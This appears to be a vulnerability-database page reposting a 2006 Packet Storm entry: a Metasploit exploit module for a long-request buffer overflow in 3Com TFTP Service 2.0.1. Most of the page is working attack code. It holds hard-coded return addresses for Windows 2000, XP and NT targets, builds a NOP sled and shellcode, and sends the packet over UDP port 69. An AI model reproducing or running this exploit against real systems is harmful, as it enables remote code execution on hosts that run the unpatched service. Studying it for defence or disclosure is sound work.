Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

3comtftp.txt

🗓️ 06 Dec 2006 00:00:00Reported by Kurt GrutzmacherType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

3Com TFTP Service version 2.0.1 suffers from a long type buffer overflow during a write TFTP request, attacker controls ESI

Code
`Doesn't look like SEH is being overwritten so I'm having trouble getting  
this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K.   
Includes offsets for NT, 2K and XP (call esi).  
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
require 'msf/core'  
  
module Msf  
  
class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote  
  
include Exploit::Remote::Udp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',  
'Description' => %q{  
3Com TFTP Service version 2.0.1 suffers from a long type buffer  
overflow during a write TFTP request. Does not require write access  
to be enabled on the server.  
  
Attacker controls ESI.  
  
Liu Qixu of NCNIPC published this vulnerability.  
},  
'Author' => 'grutz [at] jingojango.net',  
'Version' => '$$',  
'References' =>   
[   
['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],  
['BID', '21301'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 440,  
'BadChars' => "\x00",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
  
'Targets' =>  
[  
['Windows 2000 All SP English', { 'Ret' => 0x750217ae } ], # call esi ws2help  
['Windows XP SP2 English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help  
['Windows NT SP5/6 English', { 'Ret' => 0x776a117e } ], # call esi ws2help  
],  
  
'DefaultTarget' => 0,  
'Privileged' => false,  
'DisclosureDate' => 'Nov 27 2006'  
  
))  
  
register_options(  
[  
Opt::RPORT(69)  
], self)  
  
end  
  
def exploit  
connect_udp  
  
print_status("Trying target #{target.name}...")  
  
sploit =   
"\x00\x02" +   
Rex::Text.rand_text_english(1, payload_badchars) +   
"\x00" +  
make_nops(473) +  
[target.ret].pack('V') +  
"\x00"  
  
sploit[9, payload.encoded.length] = payload.encoded  
  
udp_sock.put(sploit)  
  
disconnect_udp   
end  
  
end  
end  
  
  
--   
..:[ grutz at jingojango dot net ]:..  
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4  
"There's just no amusing way to say, 'I have a CISSP'."  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow3com tftpesi controlsecurity vulnerabilityremote exploitwindows osdep-enabledxpsp22k3xpwin2k
18